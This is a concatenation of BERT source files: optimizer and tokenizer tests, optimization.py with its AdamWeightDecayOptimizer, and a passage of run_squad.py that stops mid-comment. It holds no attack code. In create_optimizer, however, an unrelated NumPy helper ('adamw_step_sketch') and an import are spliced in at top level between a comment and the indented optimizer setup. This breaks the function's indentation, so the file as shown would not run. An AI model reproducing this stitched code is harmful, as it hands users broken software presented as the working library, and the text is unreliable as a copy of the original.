# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import optimization import tensorflow as tf class OptimizationTest(tf.test.TestCase): def test_adam(self): with self.test_session() as sess: w = tf.get_variable( "w", shape=[3], initializer=tf.constant_initializer([0.1, -0.2, -0.1])) x = tf.constant([0.4, 0.2, -0.5]) loss = tf.reduce_mean(tf.square(x - w)) tvars = tf.trainable_variables() grads = tf.gradients(loss, tvars) global_step = tf.train.get_or_create_global_step() optimizer = optimization.AdamWeightDecayOptimizer(learning_rate=0.2) train_op = optimizer.apply_gradients(zip(grads, tvars), global_step) init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) sess.run(init_op) for _ in range(100): sess.run(train_op) w_np = sess.run(w) self.assertAllClose(w_np.flat, [0.4, 0.2, -0.5], rtol=1e-2, atol=1e-2) if __name__ == "__main__": tf.test.main() File: optimization.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Functions and classes related to optimization (weight updates).""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import re import tensorflow as tf def create_optimizer(loss, init_lr, num_train_steps, num_warmup_steps, use_tpu): """Creates an optimizer training op.""" global_step = tf.train.get_or_create_global_step() learning_rate = tf.constant(value=init_lr, shape=[], dtype=tf.float32) # Implements linear decay of the learning rate. learning_rate = tf.train.polynomial_decay( learning_rate, global_step, num_train_steps, end_learning_rate=0.0, power=1.0, cycle=False) # Implements linear warmup. I.e., if global_step < num_warmup_steps, the # learning rate will be `global_step/num_warmup_steps * init_lr`. if num_warmup_steps: global_steps_int = tf.cast(global_step, tf.int32) warmup_steps_int = tf.constant(num_warmup_steps, dtype=tf.int32) global_steps_float = tf.cast(global_steps_int, tf.float32) warmup_steps_float = tf.cast(warmup_steps_int, tf.float32) warmup_percent_done = global_steps_float / warmup_steps_float warmup_learning_rate = init_lr * warmup_percent_done is_warmup = tf.cast(global_steps_int < warmup_steps_int, tf.float32) learning_rate = ( (1.0 - is_warmup) * learning_rate + is_warmup * warmup_learning_rate) # It is recommended that you use this optimizer for fine tuning, since this # is how the model was trained (note that the Adam m/v variables are NOT # loaded from init_checkpoint.) 
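# A minimal sketch of one decoupled-weight-decay Adam step on NumPy arrays,
# mirroring the update performed by `AdamWeightDecayOptimizer` below (no bias
# correction, matching that class). `adamw_step_sketch` is a hypothetical
# helper for illustration only, not part of this module's API.
import numpy as np

def adamw_step_sketch(param, grad, m, v, lr=1e-4, beta_1=0.9, beta_2=0.999,
                      epsilon=1e-6, weight_decay_rate=0.01):
  m = beta_1 * m + (1.0 - beta_1) * grad
  v = beta_2 * v + (1.0 - beta_2) * grad ** 2
  update = m / (np.sqrt(v) + epsilon)
  # The decay is applied directly to the weights rather than folded into the
  # loss, so it does not interact with the m/v accumulators.
  update += weight_decay_rate * param
  return param - lr * update, m, v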
  optimizer = AdamWeightDecayOptimizer(
      learning_rate=learning_rate,
      weight_decay_rate=0.01,
      beta_1=0.9,
      beta_2=0.999,
      epsilon=1e-6,
      exclude_from_weight_decay=["LayerNorm", "layer_norm", "bias"])

  if use_tpu:
    optimizer = tf.contrib.tpu.CrossShardOptimizer(optimizer)

  tvars = tf.trainable_variables()
  grads = tf.gradients(loss, tvars)

  # This is how the model was pre-trained.
  (grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)

  train_op = optimizer.apply_gradients(
      zip(grads, tvars), global_step=global_step)

  # Normally the global step update is done inside of `apply_gradients`.
  # However, `AdamWeightDecayOptimizer` doesn't do this. But if you use
  # a different optimizer, you should probably take this line out.
  new_global_step = global_step + 1
  train_op = tf.group(train_op, [global_step.assign(new_global_step)])
  return train_op


class AdamWeightDecayOptimizer(tf.train.Optimizer):
  """A basic Adam optimizer that includes "correct" L2 weight decay."""

  def __init__(self,
               learning_rate,
               weight_decay_rate=0.0,
               beta_1=0.9,
               beta_2=0.999,
               epsilon=1e-6,
               exclude_from_weight_decay=None,
               name="AdamWeightDecayOptimizer"):
    """Constructs an AdamWeightDecayOptimizer."""
    super(AdamWeightDecayOptimizer, self).__init__(False, name)

    self.learning_rate = learning_rate
    self.weight_decay_rate = weight_decay_rate
    self.beta_1 = beta_1
    self.beta_2 = beta_2
    self.epsilon = epsilon
    self.exclude_from_weight_decay = exclude_from_weight_decay

  def apply_gradients(self, grads_and_vars, global_step=None, name=None):
    """See base class."""
    assignments = []
    for (grad, param) in grads_and_vars:
      if grad is None or param is None:
        continue

      param_name = self._get_variable_name(param.name)

      m = tf.get_variable(
          name=param_name + "/adam_m",
          shape=param.shape.as_list(),
          dtype=tf.float32,
          trainable=False,
          initializer=tf.zeros_initializer())
      v = tf.get_variable(
          name=param_name + "/adam_v",
          shape=param.shape.as_list(),
          dtype=tf.float32,
          trainable=False,
          initializer=tf.zeros_initializer())

      # Standard Adam update.
      next_m = (
          tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad))
      next_v = (
          tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2,
                                                    tf.square(grad)))

      update = next_m / (tf.sqrt(next_v) + self.epsilon)

      # Just adding the square of the weights to the loss function is *not*
      # the correct way of using L2 regularization/weight decay with Adam,
      # since that will interact with the m and v parameters in strange ways.
      #
      # Instead we want to decay the weights in a manner that doesn't interact
      # with the m/v parameters. This is equivalent to adding the square
      # of the weights to the loss with plain (non-momentum) SGD.
      if self._do_use_weight_decay(param_name):
        update += self.weight_decay_rate * param

      update_with_lr = self.learning_rate * update

      next_param = param - update_with_lr

      assignments.extend(
          [param.assign(next_param),
           m.assign(next_m),
           v.assign(next_v)])
    return tf.group(*assignments, name=name)

  def _do_use_weight_decay(self, param_name):
    """Whether to use L2 weight decay for `param_name`."""
    if not self.weight_decay_rate:
      return False
    if self.exclude_from_weight_decay:
      for r in self.exclude_from_weight_decay:
        if re.search(r, param_name) is not None:
          return False
    return True

  def _get_variable_name(self, param_name):
    """Get the variable name from the tensor name."""
    m = re.match("^(.*):\\d+$", param_name)
    if m is not None:
      param_name = m.group(1)
    return param_name


File: tokenization_test.py

# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import tempfile import tokenization import six import tensorflow as tf class TokenizationTest(tf.test.TestCase): def test_full_tokenizer(self): vocab_tokens = [ "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn", "##ing", "," ] with tempfile.NamedTemporaryFile(delete=False) as vocab_writer: if six.PY2: vocab_writer.write("".join([x + "\n" for x in vocab_tokens])) else: vocab_writer.write("".join( [x + "\n" for x in vocab_tokens]).encode("utf-8")) vocab_file = vocab_writer.name tokenizer = tokenization.FullTokenizer(vocab_file) os.unlink(vocab_file) tokens = tokenizer.tokenize(u"UNwant\u00E9d,running") self.assertAllEqual(tokens, ["un", "##want", "##ed", ",", "runn", "##ing"]) self.assertAllEqual( tokenizer.convert_tokens_to_ids(tokens), [7, 4, 5, 10, 8, 9]) def test_chinese(self): tokenizer = tokenization.BasicTokenizer() self.assertAllEqual( tokenizer.tokenize(u"ah\u535A\u63A8zz"), [u"ah", u"\u535A", u"\u63A8", u"zz"]) def test_basic_tokenizer_lower(self): tokenizer = tokenization.BasicTokenizer(do_lower_case=True) self.assertAllEqual( tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? "), ["hello", "!", "how", "are", "you", "?"]) self.assertAllEqual(tokenizer.tokenize(u"H\u00E9llo"), ["hello"]) def test_basic_tokenizer_no_lower(self): tokenizer = tokenization.BasicTokenizer(do_lower_case=False) self.assertAllEqual( tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? 
"), ["HeLLo", "!", "how", "Are", "yoU", "?"]) def test_wordpiece_tokenizer(self): vocab_tokens = [ "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn", "##ing" ] vocab = {} for (i, token) in enumerate(vocab_tokens): vocab[token] = i tokenizer = tokenization.WordpieceTokenizer(vocab=vocab) self.assertAllEqual(tokenizer.tokenize(""), []) self.assertAllEqual( tokenizer.tokenize("unwanted running"), ["un", "##want", "##ed", "runn", "##ing"]) self.assertAllEqual( tokenizer.tokenize("unwantedX running"), ["[UNK]", "runn", "##ing"]) def test_convert_tokens_to_ids(self): vocab_tokens = [ "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn", "##ing" ] vocab = {} for (i, token) in enumerate(vocab_tokens): vocab[token] = i self.assertAllEqual( tokenization.convert_tokens_to_ids( vocab, ["un", "##want", "##ed", "runn", "##ing"]), [7, 4, 5, 8, 9]) def test_is_whitespace(self): self.assertTrue(tokenization._is_whitespace(u" ")) self.assertTrue(tokenization._is_whitespace(u"\t")) self.assertTrue(tokenization._is_whitespace(u"\r")) self.assertTrue(tokenization._is_whitespace(u"\n")) self.assertTrue(tokenization._is_whitespace(u"\u00A0")) self.assertFalse(tokenization._is_whitespace(u"A")) self.assertFalse(tokenization._is_whitespace(u"-")) def test_is_control(self): self.assertTrue(tokenization._is_control(u"\u0005")) self.assertFalse(tokenization._is_control(u"A")) self.assertFalse(tokenization._is_control(u" ")) self.assertFalse(tokenization._is_control(u"\t")) self.assertFalse(tokenization._is_control(u"\r")) self.assertFalse(tokenization._is_control(u"\U0001F4A9")) def test_is_punctuation(self): self.assertTrue(tokenization._is_punctuation(u"-")) self.assertTrue(tokenization._is_punctuation(u"$")) self.assertTrue(tokenization._is_punctuation(u"`")) self.assertTrue(tokenization._is_punctuation(u".")) self.assertFalse(tokenization._is_punctuation(u"A")) self.assertFalse(tokenization._is_punctuation(u" ")) if __name__ == "__main__": tf.test.main() File: run_squad.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run BERT on SQuAD 1.1 and SQuAD 2.0.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import json import math import os import random import modeling import optimization import tokenization import six import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_string( "output_dir", None, "The output directory where the model checkpoints will be written.") ## Other parameters flags.DEFINE_string("train_file", None, "SQuAD json for training. E.g., train-v1.1.json") flags.DEFINE_string( "predict_file", None, "SQuAD json for predictions. 
E.g., dev-v1.1.json or test-v1.1.json") flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_integer( "max_seq_length", 384, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded.") flags.DEFINE_integer( "doc_stride", 128, "When splitting up a long document into chunks, how much stride to " "take between chunks.") flags.DEFINE_integer( "max_query_length", 64, "The maximum number of tokens for the question. Questions longer than " "this will be truncated to this length.") flags.DEFINE_bool("do_train", False, "Whether to run training.") flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.") flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.") flags.DEFINE_integer("predict_batch_size", 8, "Total batch size for predictions.") flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.") flags.DEFINE_float("num_train_epochs", 3.0, "Total number of training epochs to perform.") flags.DEFINE_float( "warmup_proportion", 0.1, "Proportion of training to perform linear learning rate warmup for. " "E.g., 0.1 = 10% of training.") flags.DEFINE_integer("save_checkpoints_steps", 1000, "How often to save the model checkpoint.") flags.DEFINE_integer("iterations_per_loop", 1000, "How many steps to make in each estimator call.") flags.DEFINE_integer( "n_best_size", 20, "The total number of n-best predictions to generate in the " "nbest_predictions.json output file.") flags.DEFINE_integer( "max_answer_length", 30, "The maximum length of an answer that can be generated. This is needed " "because the start and end predictions are not conditioned on one another.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") tf.flags.DEFINE_string( "tpu_name", None, "The Cloud TPU to use for training. This should be either the name " "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 " "url.") tf.flags.DEFINE_string( "tpu_zone", None, "[Optional] GCE zone where the Cloud TPU is located in. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string( "gcp_project", None, "[Optional] Project name for the Cloud TPU-enabled project. If not " "specified, we will attempt to automatically detect the GCE project from " "metadata.") tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") flags.DEFINE_bool( "verbose_logging", False, "If true, all of the warnings related to data processing will be printed. " "A number of warnings are expected for a normal SQuAD evaluation.") flags.DEFINE_bool( "version_2_with_negative", False, "If true, the SQuAD examples contain some that do not have an answer.") flags.DEFINE_float( "null_score_diff_threshold", 0.0, "If null_score - best_non_null is greater than the threshold predict null.") class SquadExample(object): """A single training/test example for simple sequence classification. For examples without an answer, the start and end position are -1. 
""" def __init__(self, qas_id, question_text, doc_tokens, orig_answer_text=None, start_position=None, end_position=None, is_impossible=False): self.qas_id = qas_id self.question_text = question_text self.doc_tokens = doc_tokens self.orig_answer_text = orig_answer_text self.start_position = start_position self.end_position = end_position self.is_impossible = is_impossible def __str__(self): return self.__repr__() def __repr__(self): s = "" s += "qas_id: %s" % (tokenization.printable_text(self.qas_id)) s += ", question_text: %s" % ( tokenization.printable_text(self.question_text)) s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens)) if self.start_position: s += ", start_position: %d" % (self.start_position) if self.start_position: s += ", end_position: %d" % (self.end_position) if self.start_position: s += ", is_impossible: %r" % (self.is_impossible) return s class InputFeatures(object): """A single set of features of data.""" def __init__(self, unique_id, example_index, doc_span_index, tokens, token_to_orig_map, token_is_max_context, input_ids, input_mask, segment_ids, start_position=None, end_position=None, is_impossible=None): self.unique_id = unique_id self.example_index = example_index self.doc_span_index = doc_span_index self.tokens = tokens self.token_to_orig_map = token_to_orig_map self.token_is_max_context = token_is_max_context self.input_ids = input_ids self.input_mask = input_mask self.segment_ids = segment_ids self.start_position = start_position self.end_position = end_position self.is_impossible = is_impossible def read_squad_examples(input_file, is_training): """Read a SQuAD json file into a list of SquadExample.""" with tf.gfile.Open(input_file, "r") as reader: input_data = json.load(reader)["data"] def is_whitespace(c): if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F: return True return False examples = [] for entry in input_data: for paragraph in entry["paragraphs"]: paragraph_text = paragraph["context"] doc_tokens = [] char_to_word_offset = [] prev_is_whitespace = True for c in paragraph_text: if is_whitespace(c): prev_is_whitespace = True else: if prev_is_whitespace: doc_tokens.append(c) else: doc_tokens[-1] += c prev_is_whitespace = False char_to_word_offset.append(len(doc_tokens) - 1) for qa in paragraph["qas"]: qas_id = qa["id"] question_text = qa["question"] start_position = None end_position = None orig_answer_text = None is_impossible = False if is_training: if FLAGS.version_2_with_negative: is_impossible = qa["is_impossible"] if (len(qa["answers"]) != 1) and (not is_impossible): raise ValueError( "For training, each question should have exactly 1 answer.") if not is_impossible: answer = qa["answers"][0] orig_answer_text = answer["text"] answer_offset = answer["answer_start"] answer_length = len(orig_answer_text) start_position = char_to_word_offset[answer_offset] end_position = char_to_word_offset[answer_offset + answer_length - 1] # Only add answers where the text can be exactly recovered from the # document. If this CAN'T happen it's likely due to weird Unicode # stuff so we will just skip the example. # # Note that this means for training mode, every example is NOT # guaranteed to be preserved. actual_text = " ".join( doc_tokens[start_position:(end_position + 1)]) cleaned_answer_text = " ".join( tokenization.whitespace_tokenize(orig_answer_text)) if actual_text.find(cleaned_answer_text) == -1: tf.logging.warning("Could not find answer: '%s' vs. 
'%s'", actual_text, cleaned_answer_text) continue else: start_position = -1 end_position = -1 orig_answer_text = "" example = SquadExample( qas_id=qas_id, question_text=question_text, doc_tokens=doc_tokens, orig_answer_text=orig_answer_text, start_position=start_position, end_position=end_position, is_impossible=is_impossible) examples.append(example) return examples def convert_examples_to_features(examples, tokenizer, max_seq_length, doc_stride, max_query_length, is_training, output_fn): """Loads a data file into a list of `InputBatch`s.""" unique_id = 1000000000 for (example_index, example) in enumerate(examples): query_tokens = tokenizer.tokenize(example.question_text) if len(query_tokens) > max_query_length: query_tokens = query_tokens[0:max_query_length] tok_to_orig_index = [] orig_to_tok_index = [] all_doc_tokens = [] for (i, token) in enumerate(example.doc_tokens): orig_to_tok_index.append(len(all_doc_tokens)) sub_tokens = tokenizer.tokenize(token) for sub_token in sub_tokens: tok_to_orig_index.append(i) all_doc_tokens.append(sub_token) tok_start_position = None tok_end_position = None if is_training and example.is_impossible: tok_start_position = -1 tok_end_position = -1 if is_training and not example.is_impossible: tok_start_position = orig_to_tok_index[example.start_position] if example.end_position < len(example.doc_tokens) - 1: tok_end_position = orig_to_tok_index[example.end_position + 1] - 1 else: tok_end_position = len(all_doc_tokens) - 1 (tok_start_position, tok_end_position) = _improve_answer_span( all_doc_tokens, tok_start_position, tok_end_position, tokenizer, example.orig_answer_text) # The -3 accounts for [CLS], [SEP] and [SEP] max_tokens_for_doc = max_seq_length - len(query_tokens) - 3 # We can have documents that are longer than the maximum sequence length. # To deal with this we do a sliding window approach, where we take chunks # of the up to our max length with a stride of `doc_stride`. _DocSpan = collections.namedtuple( # pylint: disable=invalid-name "DocSpan", ["start", "length"]) doc_spans = [] start_offset = 0 while start_offset < len(all_doc_tokens): length = len(all_doc_tokens) - start_offset if length > max_tokens_for_doc: length = max_tokens_for_doc doc_spans.append(_DocSpan(start=start_offset, length=length)) if start_offset + length == len(all_doc_tokens): break start_offset += min(length, doc_stride) for (doc_span_index, doc_span) in enumerate(doc_spans): tokens = [] token_to_orig_map = {} token_is_max_context = {} segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in query_tokens: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) for i in range(doc_span.length): split_token_index = doc_span.start + i token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index] is_max_context = _check_is_max_context(doc_spans, doc_span_index, split_token_index) token_is_max_context[len(tokens)] = is_max_context tokens.append(all_doc_tokens[split_token_index]) segment_ids.append(1) tokens.append("[SEP]") segment_ids.append(1) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. 
while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length start_position = None end_position = None if is_training and not example.is_impossible: # For training, if our document chunk does not contain an annotation # we throw it out, since there is nothing to predict. doc_start = doc_span.start doc_end = doc_span.start + doc_span.length - 1 out_of_span = False if not (tok_start_position >= doc_start and tok_end_position <= doc_end): out_of_span = True if out_of_span: start_position = 0 end_position = 0 else: doc_offset = len(query_tokens) + 2 start_position = tok_start_position - doc_start + doc_offset end_position = tok_end_position - doc_start + doc_offset if is_training and example.is_impossible: start_position = 0 end_position = 0 if example_index < 20: tf.logging.info("*** Example ***") tf.logging.info("unique_id: %s" % (unique_id)) tf.logging.info("example_index: %s" % (example_index)) tf.logging.info("doc_span_index: %s" % (doc_span_index)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("token_to_orig_map: %s" % " ".join( ["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)])) tf.logging.info("token_is_max_context: %s" % " ".join([ "%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context) ])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info( "input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info( "segment_ids: %s" % " ".join([str(x) for x in segment_ids])) if is_training and example.is_impossible: tf.logging.info("impossible example") if is_training and not example.is_impossible: answer_text = " ".join(tokens[start_position:(end_position + 1)]) tf.logging.info("start_position: %d" % (start_position)) tf.logging.info("end_position: %d" % (end_position)) tf.logging.info( "answer: %s" % (tokenization.printable_text(answer_text))) feature = InputFeatures( unique_id=unique_id, example_index=example_index, doc_span_index=doc_span_index, tokens=tokens, token_to_orig_map=token_to_orig_map, token_is_max_context=token_is_max_context, input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, start_position=start_position, end_position=end_position, is_impossible=example.is_impossible) # Run callback output_fn(feature) unique_id += 1 def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text): """Returns tokenized answer spans that better match the annotated answer.""" # The SQuAD annotations are character based. We first project them to # whitespace-tokenized words. But then after WordPiece tokenization, we can # often find a "better match". For example: # # Question: What year was John Smith born? # Context: The leader was John Smith (1895-1943). # Answer: 1895 # # The original whitespace-tokenized answer will be "(1895-1943).". However # after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match # the exact answer, 1895. # # However, this is not always possible. Consider the following: # # Question: What country is the top exporter of electornics? # Context: The Japanese electronics industry is the lagest in the world. # Answer: Japan # # In this case, the annotator chose "Japan" as a character sub-span of # the word "Japanese". Since our WordPiece tokenizer does not split # "Japanese", we just use "Japanese" as the annotation. 
This is fairly rare # in SQuAD, but does happen. tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text)) for new_start in range(input_start, input_end + 1): for new_end in range(input_end, new_start - 1, -1): text_span = " ".join(doc_tokens[new_start:(new_end + 1)]) if text_span == tok_answer_text: return (new_start, new_end) return (input_start, input_end) def _check_is_max_context(doc_spans, cur_span_index, position): """Check if this is the 'max context' doc span for the token.""" # Because of the sliding window approach taken to scoring documents, a single # token can appear in multiple documents. E.g. # Doc: the man went to the store and bought a gallon of milk # Span A: the man went to the # Span B: to the store and bought # Span C: and bought a gallon of # ... # # Now the word 'bought' will have two scores from spans B and C. We only # want to consider the score with "maximum context", which we define as # the *minimum* of its left and right context (the *sum* of left and # right context will always be the same, of course). # # In the example the maximum context for 'bought' would be span C since # it has 1 left context and 3 right context, while span B has 4 left context # and 0 right context. best_score = None best_span_index = None for (span_index, doc_span) in enumerate(doc_spans): end = doc_span.start + doc_span.length - 1 if position < doc_span.start: continue if position > end: continue num_left_context = position - doc_span.start num_right_context = end - position score = min(num_left_context, num_right_context) + 0.01 * doc_span.length if best_score is None or score > best_score: best_score = score best_span_index = span_index return cur_span_index == best_span_index def create_model(bert_config, is_training, input_ids, input_mask, segment_ids, use_one_hot_embeddings): """Creates a classification model.""" model = modeling.BertModel( config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) final_hidden = model.get_sequence_output() final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3) batch_size = final_hidden_shape[0] seq_length = final_hidden_shape[1] hidden_size = final_hidden_shape[2] output_weights = tf.get_variable( "cls/squad/output_weights", [2, hidden_size], initializer=tf.truncated_normal_initializer(stddev=0.02)) output_bias = tf.get_variable( "cls/squad/output_bias", [2], initializer=tf.zeros_initializer()) final_hidden_matrix = tf.reshape(final_hidden, [batch_size * seq_length, hidden_size]) logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) logits = tf.reshape(logits, [batch_size, seq_length, 2]) logits = tf.transpose(logits, [2, 0, 1]) unstacked_logits = tf.unstack(logits, axis=0) (start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1]) return (start_logits, end_logits) def model_fn_builder(bert_config, init_checkpoint, learning_rate, num_train_steps, num_warmup_steps, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) unique_ids = features["unique_ids"] input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = 
features["segment_ids"] is_training = (mode == tf.estimator.ModeKeys.TRAIN) (start_logits, end_logits) = create_model( bert_config=bert_config, is_training=is_training, input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, use_one_hot_embeddings=use_one_hot_embeddings) tvars = tf.trainable_variables() initialized_variable_names = {} scaffold_fn = None if init_checkpoint: (assignment_map, initialized_variable_names ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: seq_length = modeling.get_shape_list(input_ids)[1] def compute_loss(logits, positions): one_hot_positions = tf.one_hot( positions, depth=seq_length, dtype=tf.float32) log_probs = tf.nn.log_softmax(logits, axis=-1) loss = -tf.reduce_mean( tf.reduce_sum(one_hot_positions * log_probs, axis=-1)) return loss start_positions = features["start_positions"] end_positions = features["end_positions"] start_loss = compute_loss(start_logits, start_positions) end_loss = compute_loss(end_logits, end_positions) total_loss = (start_loss + end_loss) / 2.0 train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op, scaffold_fn=scaffold_fn) elif mode == tf.estimator.ModeKeys.PREDICT: predictions = { "unique_ids": unique_ids, "start_logits": start_logits, "end_logits": end_logits, } output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions=predictions, scaffold_fn=scaffold_fn) else: raise ValueError( "Only TRAIN and PREDICT modes are supported: %s" % (mode)) return output_spec return model_fn def input_fn_builder(input_file, seq_length, is_training, drop_remainder): """Creates an `input_fn` closure to be passed to TPUEstimator.""" name_to_features = { "unique_ids": tf.FixedLenFeature([], tf.int64), "input_ids": tf.FixedLenFeature([seq_length], tf.int64), "input_mask": tf.FixedLenFeature([seq_length], tf.int64), "segment_ids": tf.FixedLenFeature([seq_length], tf.int64), } if is_training: name_to_features["start_positions"] = tf.FixedLenFeature([], tf.int64) name_to_features["end_positions"] = tf.FixedLenFeature([], tf.int64) def _decode_record(record, name_to_features): """Decodes a record to a TensorFlow example.""" example = tf.parse_single_example(record, name_to_features) # tf.Example only supports tf.int64, but the TPU only supports tf.int32. # So cast all int64 to int32. for name in list(example.keys()): t = example[name] if t.dtype == tf.int64: t = tf.to_int32(t) example[name] = t return example def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] # For training, we want a lot of parallel reading and shuffling. # For eval, we want no shuffling and parallel reading doesn't matter. 
d = tf.data.TFRecordDataset(input_file) if is_training: d = d.repeat() d = d.shuffle(buffer_size=100) d = d.apply( tf.contrib.data.map_and_batch( lambda record: _decode_record(record, name_to_features), batch_size=batch_size, drop_remainder=drop_remainder)) return d return input_fn RawResult = collections.namedtuple("RawResult", ["unique_id", "start_logits", "end_logits"]) def write_predictions(all_examples, all_features, all_results, n_best_size, max_answer_length, do_lower_case, output_prediction_file, output_nbest_file, output_null_log_odds_file): """Write final predictions to the json file and log-odds of null if needed.""" tf.logging.info("Writing predictions to: %s" % (output_prediction_file)) tf.logging.info("Writing nbest to: %s" % (output_nbest_file)) example_index_to_features = collections.defaultdict(list) for feature in all_features: example_index_to_features[feature.example_index].append(feature) unique_id_to_result = {} for result in all_results: unique_id_to_result[result.unique_id] = result _PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name "PrelimPrediction", ["feature_index", "start_index", "end_index", "start_logit", "end_logit"]) all_predictions = collections.OrderedDict() all_nbest_json = collections.OrderedDict() scores_diff_json = collections.OrderedDict() for (example_index, example) in enumerate(all_examples): features = example_index_to_features[example_index] prelim_predictions = [] # keep track of the minimum score of null start+end of position 0 score_null = 1000000 # large and positive min_null_feature_index = 0 # the paragraph slice with min mull score null_start_logit = 0 # the start logit at the slice with min null score null_end_logit = 0 # the end logit at the slice with min null score for (feature_index, feature) in enumerate(features): result = unique_id_to_result[feature.unique_id] start_indexes = _get_best_indexes(result.start_logits, n_best_size) end_indexes = _get_best_indexes(result.end_logits, n_best_size) # if we could have irrelevant answers, get the 